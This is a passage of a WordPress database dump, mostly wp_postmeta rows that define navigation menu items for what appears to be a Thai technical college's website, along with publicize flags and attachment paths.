(4139, 1243, '_menu_item_target', ''),
(4140, 1243, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4141, 1243, '_menu_item_xfn', ''),
(4142, 1243, '_menu_item_url', '#'),
(4144, 1244, '_menu_item_type', 'custom'),
(4145, 1244, '_menu_item_menu_item_parent', '1243'),
(4146, 1244, '_menu_item_object_id', '1244'),
(4147, 1244, '_menu_item_object', 'custom'),
(4148, 1244, '_menu_item_target', ''),
(4149, 1244, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4150, 1244, '_menu_item_xfn', ''),
(4151, 1244, '_menu_item_url', '#'),
(4153, 1245, '_menu_item_type', 'custom'),
(4154, 1245, '_menu_item_menu_item_parent', '1244'),
(4155, 1245, '_menu_item_object_id', '1245'),
(4156, 1245, '_menu_item_object', 'custom'),
(4157, 1245, '_menu_item_target', ''),
(4158, 1245, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4159, 1245, '_menu_item_xfn', ''),
(4160, 1245, '_menu_item_url', '#'),
(4162, 1246, '_menu_item_type', 'custom'),
(4163, 1246, '_menu_item_menu_item_parent', '1244'),
(4164, 1246, '_menu_item_object_id', '1246'),
(4165, 1246, '_menu_item_object', 'custom'),
(4166, 1246, '_menu_item_target', ''),
(4167, 1246, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4168, 1246, '_menu_item_xfn', ''),
(4169, 1246, '_menu_item_url', '/en/the-college-background'),
(4171, 1247, '_menu_item_type', 'custom'),
(4172, 1247, '_menu_item_menu_item_parent', '1244'),
(4173, 1247, '_menu_item_object_id', '1247'),
(4174, 1247, '_menu_item_object', 'custom'),
(4175, 1247, '_menu_item_target', ''),
(4176, 1247, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4177, 1247, '_menu_item_xfn', ''),
(4178, 1247, '_menu_item_url', '#'),
(4180, 1248, '_menu_item_type', 'custom'),
(4181, 1248, '_menu_item_menu_item_parent', '1244'),
(4182, 1248, '_menu_item_object_id', '1248'),
(4183, 1248, '_menu_item_object', 'custom'),
(4184, 1248, '_menu_item_target', ''),
(4185, 1248, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4186, 1248, '_menu_item_xfn', ''),
(4187, 1248, '_menu_item_url', '#'),
(4189, 1249, '_menu_item_type', 'custom'),
(4190, 1249, '_menu_item_menu_item_parent', '1244'),
(4191, 1249, '_menu_item_object_id', '1249'),
(4192, 1249, '_menu_item_object', 'custom'),
(4193, 1249, '_menu_item_target', ''),
(4194, 1249, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4195, 1249, '_menu_item_xfn', ''),
(4196, 1249, '_menu_item_url', '#'),
(4198, 1250, '_menu_item_type', 'custom'),
(4199, 1250, '_menu_item_menu_item_parent', '1244'),
(4200, 1250, '_menu_item_object_id', '1250'),
(4201, 1250, '_menu_item_object', 'custom'),
(4202, 1250, '_menu_item_target', ''),
(4203, 1250, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4204, 1250, '_menu_item_xfn', ''),
(4205, 1250, '_menu_item_url', '#'),
(4207, 1251, '_menu_item_type', 'custom'),
(4208, 1251, '_menu_item_menu_item_parent', '1244'),
(4209, 1251, '_menu_item_object_id', '1251'),
(4210, 1251, '_menu_item_object', 'custom'),
(4211, 1251, '_menu_item_target', ''),
(4212, 1251, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4213, 1251, '_menu_item_xfn', ''),
(4214, 1251, '_menu_item_url', '#'),
(4216, 1252, '_menu_item_type', 'custom'),
(4217, 1252, '_menu_item_menu_item_parent', '1244'),
(4218, 1252, '_menu_item_object_id', '1252'),
(4219, 1252, '_menu_item_object', 'custom'),
(4220, 1252, '_menu_item_target', ''),
(4221, 1252, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4222, 1252, '_menu_item_xfn', ''),
(4223, 1252, '_menu_item_url', '#'),
(4225, 1253, '_menu_item_type', 'custom'),
(4226, 1253, '_menu_item_menu_item_parent', '1244'),
(4227, 1253, '_menu_item_object_id', '1253'),
(4228, 1253, '_menu_item_object', 'custom'),
(4229, 1253, '_menu_item_target', ''),
(4230, 1253, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4231, 1253, '_menu_item_xfn', ''),
(4232, 1253, '_menu_item_url', '#'),
(4234, 1254, '_menu_item_type', 'custom'),
(4235, 1254, '_menu_item_menu_item_parent', '1243'),
(4236, 1254, '_menu_item_object_id', '1254'),
(4237, 1254, '_menu_item_object', 'custom'),
(4238, 1254, '_menu_item_target', ''),
(4239, 1254, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4240, 1254, '_menu_item_xfn', ''),
(4241, 1254, '_menu_item_url', '#'),
(4243, 1255, '_menu_item_type', 'custom'),
(4244, 1255, '_menu_item_menu_item_parent', '1243'),
(4245, 1255, '_menu_item_object_id', '1255'),
(4246, 1255, '_menu_item_object', 'custom'),
(4247, 1255, '_menu_item_target', ''),
(4248, 1255, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4249, 1255, '_menu_item_xfn', ''),
(4250, 1255, '_menu_item_url', 'http://www.technicrayong.ac.th/en/the-college-background/'),
(4252, 1256, '_menu_item_type', 'custom'),
(4253, 1256, '_menu_item_menu_item_parent', '1243'),
(4254, 1256, '_menu_item_object_id', '1256'),
(4255, 1256, '_menu_item_object', 'custom'),
(4256, 1256, '_menu_item_target', ''),
(4257, 1256, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4258, 1256, '_menu_item_xfn', ''),
(4259, 1256, '_menu_item_url', '#'),
(4261, 1257, '_menu_item_type', 'custom'),
(4262, 1257, '_menu_item_menu_item_parent', '1243'),
(4263, 1257, '_menu_item_object_id', '1257'),
(4264, 1257, '_menu_item_object', 'custom'),
(4265, 1257, '_menu_item_target', ''),
(4266, 1257, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4267, 1257, '_menu_item_xfn', ''),
(4268, 1257, '_menu_item_url', '#'),
(4270, 1258, '_menu_item_type', 'custom'),
(4271, 1258, '_menu_item_menu_item_parent', '1243'),
(4272, 1258, '_menu_item_object_id', '1258'),
(4273, 1258, '_menu_item_object', 'custom'),
(4274, 1258, '_menu_item_target', ''),
(4275, 1258, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4276, 1258, '_menu_item_xfn', ''),
(4277, 1258, '_menu_item_url', '#'),
(4279, 1259, '_menu_item_type', 'custom'),
(4280, 1259, '_menu_item_menu_item_parent', '1243'),
(4281, 1259, '_menu_item_object_id', '1259'),
(4282, 1259, '_menu_item_object', 'custom'),
(4283, 1259, '_menu_item_target', ''),
(4284, 1259, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4285, 1259, '_menu_item_xfn', ''),
(4286, 1259, '_menu_item_url', '#'),
(4288, 1260, '_menu_item_type', 'custom'),
(4289, 1260, '_menu_item_menu_item_parent', '1243'),
(4290, 1260, '_menu_item_object_id', '1260'),
(4291, 1260, '_menu_item_object', 'custom'),
(4292, 1260, '_menu_item_target', ''),
(4293, 1260, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4294, 1260, '_menu_item_xfn', ''),
(4295, 1260, '_menu_item_url', '#'),
(4297, 1261, '_menu_item_type', 'custom'),
(4298, 1261, '_menu_item_menu_item_parent', '1243'),
(4299, 1261, '_menu_item_object_id', '1261'),
(4300, 1261, '_menu_item_object', 'custom'),
(4301, 1261, '_menu_item_target', ''),
(4302, 1261, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4303, 1261, '_menu_item_xfn', ''),
(4304, 1261, '_menu_item_url', '#'),
(4306, 1240, '_publicize_pending', '1'),
(4307, 1241, '_publicize_pending', '1'),
(4308, 1242, '_publicize_pending', '1'),
(4309, 1243, '_publicize_pending', '1'),
(4310, 1244, '_publicize_pending', '1'),
(4311, 1245, '_publicize_pending', '1'),
(4312, 1246, '_publicize_pending', '1'),
(4313, 1247, '_publicize_pending', '1'),
(4314, 1248, '_publicize_pending', '1'),
(4315, 1249, '_publicize_pending', '1'),
(4316, 1250, '_publicize_pending', '1'),
(4317, 1251, '_publicize_pending', '1'),
(4318, 1252, '_publicize_pending', '1'),
(4319, 1253, '_publicize_pending', '1'),
(4320, 1254, '_publicize_pending', '1'),
(4321, 1255, '_publicize_pending', '1'),
(4322, 1256, '_publicize_pending', '1'),
(4323, 1257, '_publicize_pending', '1'),
(4324, 1258, '_publicize_pending', '1'),
(4325, 1259, '_publicize_pending', '1'),
(4326, 1260, '_publicize_pending', '1'),
(4327, 1261, '_publicize_pending', '1'),
(4328, 1262, '_menu_item_type', 'custom'),
(4329, 1262, '_menu_item_menu_item_parent', '0'),
(4330, 1262, '_menu_item_object_id', '1262'),
(4331, 1262, '_menu_item_object', 'custom'),
(4332, 1262, '_menu_item_target', ''),
(4333, 1262, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4334, 1262, '_menu_item_xfn', ''),
(4335, 1262, '_menu_item_url', '#'),
(4337, 1263, '_menu_item_type', 'custom'),
(4338, 1263, '_menu_item_menu_item_parent', '1262'),
(4339, 1263, '_menu_item_object_id', '1263'),
(4340, 1263, '_menu_item_object', 'custom'),
(4341, 1263, '_menu_item_target', ''),
(4342, 1263, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4343, 1263, '_menu_item_xfn', ''),
(4344, 1263, '_menu_item_url', '#'),
(4346, 1264, '_menu_item_type', 'custom'),
(4347, 1264, '_menu_item_menu_item_parent', '1263'),
(4348, 1264, '_menu_item_object_id', '1264'),
(4349, 1264, '_menu_item_object', 'custom'),
(4350, 1264, '_menu_item_target', ''),
(4351, 1264, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4352, 1264, '_menu_item_xfn', ''),
(4353, 1264, '_menu_item_url', '#'),
(4355, 1265, '_menu_item_type', 'custom'),
(4356, 1265, '_menu_item_menu_item_parent', '1263'),
(4357, 1265, '_menu_item_object_id', '1265'),
(4358, 1265, '_menu_item_object', 'custom'),
(4359, 1265, '_menu_item_target', ''),
(4360, 1265, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4361, 1265, '_menu_item_xfn', ''),
(4362, 1265, '_menu_item_url', '#'),
(4364, 1266, '_menu_item_type', 'custom'),
(4365, 1266, '_menu_item_menu_item_parent', '1263'),
(4366, 1266, '_menu_item_object_id', '1266'),
(4367, 1266, '_menu_item_object', 'custom'),
(4368, 1266, '_menu_item_target', ''),
(4369, 1266, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4370, 1266, '_menu_item_xfn', ''),
(4371, 1266, '_menu_item_url', '#'),
(4373, 1267, '_menu_item_type', 'custom'),
(4374, 1267, '_menu_item_menu_item_parent', '1263'),
(4375, 1267, '_menu_item_object_id', '1267'),
(4376, 1267, '_menu_item_object', 'custom'),
(4377, 1267, '_menu_item_target', ''),
(4378, 1267, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4379, 1267, '_menu_item_xfn', ''),
(4380, 1267, '_menu_item_url', '#'),
(4382, 1262, '_publicize_pending', '1'),
(4383, 1263, '_publicize_pending', '1'),
(4384, 1264, '_publicize_pending', '1'),
(4385, 1265, '_publicize_pending', '1'),
(4386, 1266, '_publicize_pending', '1'),
(4387, 1267, '_publicize_pending', '1'),
(4388, 1268, '_menu_item_type', 'custom'),
(4389, 1268, '_menu_item_menu_item_parent', '1263'),
(4390, 1268, '_menu_item_object_id', '1268'),
(4391, 1268, '_menu_item_object', 'custom'),
(4392, 1268, '_menu_item_target', ''),
(4393, 1268, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4394, 1268, '_menu_item_xfn', ''),
(4395, 1268, '_menu_item_url', '#'),
(4397, 1269, '_menu_item_type', 'custom'),
(4398, 1269, '_menu_item_menu_item_parent', '1263'),
(4399, 1269, '_menu_item_object_id', '1269'),
(4400, 1269, '_menu_item_object', 'custom'),
(4401, 1269, '_menu_item_target', ''),
(4402, 1269, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4403, 1269, '_menu_item_xfn', ''),
(4404, 1269, '_menu_item_url', '#'),
(4406, 1270, '_menu_item_type', 'custom'),
(4407, 1270, '_menu_item_menu_item_parent', '1263'),
(4408, 1270, '_menu_item_object_id', '1270'),
(4409, 1270, '_menu_item_object', 'custom'),
(4410, 1270, '_menu_item_target', ''),
(4411, 1270, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4412, 1270, '_menu_item_xfn', ''),
(4413, 1270, '_menu_item_url', '#'),
(4415, 1271, '_menu_item_type', 'custom'),
(4416, 1271, '_menu_item_menu_item_parent', '1263'),
(4417, 1271, '_menu_item_object_id', '1271'),
(4418, 1271, '_menu_item_object', 'custom'),
(4419, 1271, '_menu_item_target', ''),
(4420, 1271, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4421, 1271, '_menu_item_xfn', ''),
(4422, 1271, '_menu_item_url', '#'),
(4424, 1272, '_menu_item_type', 'custom'),
(4425, 1272, '_menu_item_menu_item_parent', '1263'),
(4426, 1272, '_menu_item_object_id', '1272'),
(4427, 1272, '_menu_item_object', 'custom'),
(4428, 1272, '_menu_item_target', ''),
(4429, 1272, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4430, 1272, '_menu_item_xfn', ''),
(4431, 1272, '_menu_item_url', '#'),
(4433, 1268, '_publicize_pending', '1'),
(4434, 1269, '_publicize_pending', '1'),
(4435, 1270, '_publicize_pending', '1'),
(4436, 1271, '_publicize_pending', '1'),
(4437, 1272, '_publicize_pending', '1'),
(4438, 1273, '_menu_item_type', 'custom'),
(4439, 1273, '_menu_item_menu_item_parent', '1262'),
(4440, 1273, '_menu_item_object_id', '1273'),
(4441, 1273, '_menu_item_object', 'custom'),
(4442, 1273, '_menu_item_target', ''),
(4443, 1273, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4444, 1273, '_menu_item_xfn', ''),
(4445, 1273, '_menu_item_url', '#'),
(4447, 1273, '_publicize_pending', '1'),
(4448, 1274, '_menu_item_type', 'custom'),
(4449, 1274, '_menu_item_menu_item_parent', '1273'),
(4450, 1274, '_menu_item_object_id', '1274'),
(4451, 1274, '_menu_item_object', 'custom'),
(4452, 1274, '_menu_item_target', ''),
(4453, 1274, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4454, 1274, '_menu_item_xfn', ''),
(4455, 1274, '_menu_item_url', '#'),
(4457, 1275, '_menu_item_type', 'custom'),
(4458, 1275, '_menu_item_menu_item_parent', '1273'),
(4459, 1275, '_menu_item_object_id', '1275'),
(4460, 1275, '_menu_item_object', 'custom'),
(4461, 1275, '_menu_item_target', ''),
(4462, 1275, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4463, 1275, '_menu_item_xfn', ''),
(4464, 1275, '_menu_item_url', '#'),
(4466, 1276, '_menu_item_type', 'custom'),
(4467, 1276, '_menu_item_menu_item_parent', '1273'),
(4468, 1276, '_menu_item_object_id', '1276'),
(4469, 1276, '_menu_item_object', 'custom'),
(4470, 1276, '_menu_item_target', ''),
(4471, 1276, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4472, 1276, '_menu_item_xfn', ''),
(4473, 1276, '_menu_item_url', '#'),
(4475, 1277, '_menu_item_type', 'custom'),
(4476, 1277, '_menu_item_menu_item_parent', '1273'),
(4477, 1277, '_menu_item_object_id', '1277'),
(4478, 1277, '_menu_item_object', 'custom'),
(4479, 1277, '_menu_item_target', ''),
(4480, 1277, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4481, 1277, '_menu_item_xfn', ''),
(4482, 1277, '_menu_item_url', '#'),
(4484, 1274, '_publicize_pending', '1'),
(4485, 1275, '_publicize_pending', '1'),
(4486, 1276, '_publicize_pending', '1'),
(4487, 1277, '_publicize_pending', '1'),
(4488, 1278, '_menu_item_type', 'custom'),
(4489, 1278, '_menu_item_menu_item_parent', '1273'),
(4490, 1278, '_menu_item_object_id', '1278'),
(4491, 1278, '_menu_item_object', 'custom'),
(4492, 1278, '_menu_item_target', ''),
(4493, 1278, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4494, 1278, '_menu_item_xfn', ''),
(4495, 1278, '_menu_item_url', '#'),
(4497, 1279, '_menu_item_type', 'custom'),
(4498, 1279, '_menu_item_menu_item_parent', '1273'),
(4499, 1279, '_menu_item_object_id', '1279'),
(4500, 1279, '_menu_item_object', 'custom'),
(4501, 1279, '_menu_item_target', ''),
(4502, 1279, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4503, 1279, '_menu_item_xfn', ''),
(4504, 1279, '_menu_item_url', '#'),
(4506, 1278, '_publicize_pending', '1'),
(4507, 1279, '_publicize_pending', '1'),
(4508, 1280, '_menu_item_type', 'custom'),
(4509, 1280, '_menu_item_menu_item_parent', '1273'),
(4510, 1280, '_menu_item_object_id', '1280'),
(4511, 1280, '_menu_item_object', 'custom'),
(4512, 1280, '_menu_item_target', ''),
(4513, 1280, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4514, 1280, '_menu_item_xfn', ''),
(4515, 1280, '_menu_item_url', '#'),
(4517, 1280, '_publicize_pending', '1'),
(4518, 1281, '_menu_item_type', 'custom'),
(4519, 1281, '_menu_item_menu_item_parent', '1262'),
(4520, 1281, '_menu_item_object_id', '1281'),
(4521, 1281, '_menu_item_object', 'custom'),
(4522, 1281, '_menu_item_target', ''),
(4523, 1281, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4524, 1281, '_menu_item_xfn', ''),
(4525, 1281, '_menu_item_url', '#'),
(4527, 1281, '_publicize_pending', '1'),
(4528, 1282, '_menu_item_type', 'custom'),
(4529, 1282, '_menu_item_menu_item_parent', '1281'),
(4530, 1282, '_menu_item_object_id', '1282'),
(4531, 1282, '_menu_item_object', 'custom'),
(4532, 1282, '_menu_item_target', ''),
(4533, 1282, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4534, 1282, '_menu_item_xfn', ''),
(4535, 1282, '_menu_item_url', '#'),
(4537, 1283, '_menu_item_type', 'custom'),
(4538, 1283, '_menu_item_menu_item_parent', '1281'),
(4539, 1283, '_menu_item_object_id', '1283'),
(4540, 1283, '_menu_item_object', 'custom'),
(4541, 1283, '_menu_item_target', ''),
(4542, 1283, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4543, 1283, '_menu_item_xfn', ''),
(4544, 1283, '_menu_item_url', '#'),
(4546, 1284, '_menu_item_type', 'custom'),
(4547, 1284, '_menu_item_menu_item_parent', '1281'),
(4548, 1284, '_menu_item_object_id', '1284'),
(4549, 1284, '_menu_item_object', 'custom'),
(4550, 1284, '_menu_item_target', ''),
(4551, 1284, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4552, 1284, '_menu_item_xfn', ''),
(4553, 1284, '_menu_item_url', '#'),
(4555, 1282, '_publicize_pending', '1'),
(4556, 1283, '_publicize_pending', '1'),
(4557, 1284, '_publicize_pending', '1'),
(4558, 1285, '_menu_item_type', 'custom'),
(4559, 1285, '_menu_item_menu_item_parent', '1281'),
(4560, 1285, '_menu_item_object_id', '1285'),
(4561, 1285, '_menu_item_object', 'custom'),
(4562, 1285, '_menu_item_target', ''),
(4563, 1285, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4564, 1285, '_menu_item_xfn', ''),
(4565, 1285, '_menu_item_url', '#'),
(4567, 1285, '_publicize_pending', '1'),
(4568, 1286, '_menu_item_type', 'custom'),
(4569, 1286, '_menu_item_menu_item_parent', '1281'),
(4570, 1286, '_menu_item_object_id', '1286'),
(4571, 1286, '_menu_item_object', 'custom'),
(4572, 1286, '_menu_item_target', ''),
(4573, 1286, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4574, 1286, '_menu_item_xfn', ''),
(4575, 1286, '_menu_item_url', '#'),
(4577, 1286, '_publicize_pending', '1'),
(4578, 1287, '_menu_item_type', 'custom'),
(4579, 1287, '_menu_item_menu_item_parent', '1281'),
(4580, 1287, '_menu_item_object_id', '1287'),
(4581, 1287, '_menu_item_object', 'custom'),
(4582, 1287, '_menu_item_target', ''),
(4583, 1287, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4584, 1287, '_menu_item_xfn', ''),
(4585, 1287, '_menu_item_url', '#'),
(4587, 1288, '_menu_item_type', 'custom'),
(4588, 1288, '_menu_item_menu_item_parent', '1281'),
(4589, 1288, '_menu_item_object_id', '1288'),
(4590, 1288, '_menu_item_object', 'custom'),
(4591, 1288, '_menu_item_target', ''),
(4592, 1288, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4593, 1288, '_menu_item_xfn', ''),
(4594, 1288, '_menu_item_url', '#'),
(4596, 1289, '_menu_item_type', 'custom'),
(4597, 1289, '_menu_item_menu_item_parent', '1262'),
(4598, 1289, '_menu_item_object_id', '1289'),
(4599, 1289, '_menu_item_object', 'custom'),
(4600, 1289, '_menu_item_target', ''),
(4601, 1289, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4602, 1289, '_menu_item_xfn', ''),
(4603, 1289, '_menu_item_url', '#'),
(4605, 1290, '_menu_item_type', 'custom'),
(4606, 1290, '_menu_item_menu_item_parent', '1289'),
(4607, 1290, '_menu_item_object_id', '1290'),
(4608, 1290, '_menu_item_object', 'custom'),
(4609, 1290, '_menu_item_target', ''),
(4610, 1290, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4611, 1290, '_menu_item_xfn', ''),
(4612, 1290, '_menu_item_url', '#'),
(4614, 1287, '_publicize_pending', '1'),
(4615, 1288, '_publicize_pending', '1'),
(4616, 1289, '_publicize_pending', '1'),
(4617, 1290, '_publicize_pending', '1'),
(4618, 1292, '_menu_item_type', 'custom'),
(4619, 1292, '_menu_item_menu_item_parent', '1289'),
(4620, 1292, '_menu_item_object_id', '1292'),
(4621, 1292, '_menu_item_object', 'custom'),
(4622, 1292, '_menu_item_target', ''),
(4623, 1292, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4624, 1292, '_menu_item_xfn', ''),
(4625, 1292, '_menu_item_url', '#'),
(4627, 1292, '_publicize_pending', '1'),
(4628, 1293, '_menu_item_type', 'custom'),
(4629, 1293, '_menu_item_menu_item_parent', '1289'),
(4630, 1293, '_menu_item_object_id', '1293'),
(4631, 1293, '_menu_item_object', 'custom'),
(4632, 1293, '_menu_item_target', ''),
(4633, 1293, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4634, 1293, '_menu_item_xfn', ''),
(4635, 1293, '_menu_item_url', '#'),
(4637, 1293, '_publicize_pending', '1'),
(4638, 1294, '_menu_item_type', 'custom'),
(4639, 1294, '_menu_item_menu_item_parent', '1289'),
(4640, 1294, '_menu_item_object_id', '1294'),
(4641, 1294, '_menu_item_object', 'custom'),
(4642, 1294, '_menu_item_target', ''),
(4643, 1294, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4644, 1294, '_menu_item_xfn', ''),
(4645, 1294, '_menu_item_url', '#'),
(4647, 1295, '_menu_item_type', 'custom'),
(4648, 1295, '_menu_item_menu_item_parent', '1289'),
(4649, 1295, '_menu_item_object_id', '1295'),
(4650, 1295, '_menu_item_object', 'custom'),
(4651, 1295, '_menu_item_target', ''),
(4652, 1295, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4653, 1295, '_menu_item_xfn', ''),
(4654, 1295, '_menu_item_url', '#'),
(4656, 1294, '_publicize_pending', '1'),
(4657, 1295, '_publicize_pending', '1'),
(4658, 1296, '_menu_item_type', 'custom'),
(4659, 1296, '_menu_item_menu_item_parent', '0'),
(4660, 1296, '_menu_item_object_id', '1296'),
(4661, 1296, '_menu_item_object', 'custom'),
(4662, 1296, '_menu_item_target', ''),
(4663, 1296, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4664, 1296, '_menu_item_xfn', ''),
(4665, 1296, '_menu_item_url', '#'),
(4667, 1297, '_menu_item_type', 'custom'),
(4668, 1297, '_menu_item_menu_item_parent', '1296'),
(4669, 1297, '_menu_item_object_id', '1297'),
(4670, 1297, '_menu_item_object', 'custom'),
(4671, 1297, '_menu_item_target', ''),
(4672, 1297, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4673, 1297, '_menu_item_xfn', ''),
(4674, 1297, '_menu_item_url', '#'),
(4676, 1298, '_menu_item_type', 'custom'),
(4677, 1298, '_menu_item_menu_item_parent', '1296'),
(4678, 1298, '_menu_item_object_id', '1298'),
(4679, 1298, '_menu_item_object', 'custom'),
(4680, 1298, '_menu_item_target', ''),
(4681, 1298, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4682, 1298, '_menu_item_xfn', ''),
(4683, 1298, '_menu_item_url', '#'),
(4685, 1296, '_publicize_pending', '1'),
(4686, 1297, '_publicize_pending', '1'),
(4687, 1298, '_publicize_pending', '1'),
(4688, 1299, '_edit_lock', '1519286066:3'),
(4689, 1299, '_edit_last', '3'),
(4690, 1300, '_wp_attached_file', '2018/02/ประกาศรับสมัครเจ้าหน้าที่งานกิจกรรม.pdf'),
(4691, 1301, '_wp_attached_file', '2018/02/ประกาศรับสมัครเจ้าหน้าที่งานกิจกรรม-1.pdf'),
(4692, 1299, '_hide_featured', NULL),
(4693, 1299, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575188183;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(4697, 1299, '_wpas_done_all', '1'),
(4698, 1304, '_menu_item_type', 'custom'),
(4699, 1304, '_menu_item_menu_item_parent', '1296'),
(4700, 1304, '_menu_item_object_id', '1304'),
(4701, 1304, '_menu_item_object', 'custom'),
(4702, 1304, '_menu_item_target', ''),
(4703, 1304, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4704, 1304, '_menu_item_xfn', ''),
(4705, 1304, '_menu_item_url', '#'),
(4707, 1305, '_menu_item_type', 'custom'),
(4708, 1305, '_menu_item_menu_item_parent', '1296'),
(4709, 1305, '_menu_item_object_id', '1305'),
(4710, 1305, '_menu_item_object', 'custom'),
(4711, 1305, '_menu_item_target', ''),
(4712, 1305, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4713, 1305, '_menu_item_xfn', ''),
(4714, 1305, '_menu_item_url', '#'),
(4716, 1306, '_menu_item_type', 'custom'),
(4717, 1306, '_menu_item_menu_item_parent', '1296'),
(4718, 1306, '_menu_item_object_id', '1306'),
(4719, 1306, '_menu_item_object', 'custom'),
(4720, 1306, '_menu_item_target', ''),
(4721, 1306, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4722, 1306, '_menu_item_xfn', ''),
(4723, 1306, '_menu_item_url', '#'),
(4725, 1304, '_publicize_pending', '1'),
(4726, 1305, '_publicize_pending', '1'),
(4727, 1306, '_publicize_pending', '1'),
(4728, 1307, '_menu_item_type', 'custom'),
(4729, 1307, '_menu_item_menu_item_parent', '1298'),
(4730, 1307, '_menu_item_object_id', '1307'),
(4731, 1307, '_menu_item_object', 'custom'),
(4732, 1307, '_menu_item_target', ''),
(4733, 1307, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4734, 1307, '_menu_item_xfn', ''),
(4735, 1307, '_menu_item_url', '#'),
(4737, 1308, '_menu_item_type', 'custom'),
(4738, 1308, '_menu_item_menu_item_parent', '1298'),
(4739, 1308, '_menu_item_object_id', '1308');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(4740, 1308, '_menu_item_object', 'custom'),
(4741, 1308, '_menu_item_target', ''),
(4742, 1308, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4743, 1308, '_menu_item_xfn', ''),
(4744, 1308, '_menu_item_url', '#'),
(4746, 1309, '_menu_item_type', 'custom'),
(4747, 1309, '_menu_item_menu_item_parent', '1298'),
(4748, 1309, '_menu_item_object_id', '1309'),
(4749, 1309, '_menu_item_object', 'custom'),
(4750, 1309, '_menu_item_target', ''),
(4751, 1309, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4752, 1309, '_menu_item_xfn', ''),
(4753, 1309, '_menu_item_url', '#'),
(4755, 1310, '_menu_item_type', 'custom'),
(4756, 1310, '_menu_item_menu_item_parent', '1298'),
(4757, 1310, '_menu_item_object_id', '1310'),
(4758, 1310, '_menu_item_object', 'custom'),
(4759, 1310, '_menu_item_target', ''),
(4760, 1310, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4761, 1310, '_menu_item_xfn', ''),
(4762, 1310, '_menu_item_url', '#'),
(4764, 1311, '_menu_item_type', 'custom'),
(4765, 1311, '_menu_item_menu_item_parent', '1298'),
(4766, 1311, '_menu_item_object_id', '1311'),
(4767, 1311, '_menu_item_object', 'custom'),
(4768, 1311, '_menu_item_target', ''),
(4769, 1311, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(4770, 1311, '_menu_item_xfn', ''),
(4771, 1311, '_menu_item_url', '#'),
(4773, 1312, '_menu_item_type', 'custom'),
(4774, 1312, '_menu_item_menu_item_parent', '1298'),
(4775, 1312, '_menu_item_object_id', '1312'),
(4776, 1312, '_menu_item_object', 'custom'),
(4777, 1312, '_menu_item_target', ''),
